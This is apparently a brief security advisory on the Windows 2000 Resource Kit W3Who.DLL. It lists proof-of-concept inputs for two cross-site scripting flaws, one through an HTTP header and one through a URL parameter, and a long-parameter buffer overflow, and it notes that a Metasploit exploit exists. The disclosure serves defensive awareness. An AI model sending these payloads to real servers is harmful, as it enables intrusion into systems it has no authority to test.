|
Microsoft Windows 2000 Resource Kit W3Who.DLL Multiple Remote Vulnerabilities
The following proof of concept exploits have been made available: XSS vulnerability when displaying HTTP headers : Connection: keep-alive<script>alert("Hello")</script> XSS vulnerability in error message : http://www.example.com/scripts/w3who.dll?bogus=<script>alert("Hello")</script> Buffer overflow when called with long parameters : http://www.example.com/scripts/w3who.dll?AAAAAAAAA...[519 to 12571]....AAAAAAAAAAAAA An exploit for the w3who.dll buffer overflow has been released as part of the MetaSploit Framework 2.3. |
|
 Privacy Statement |
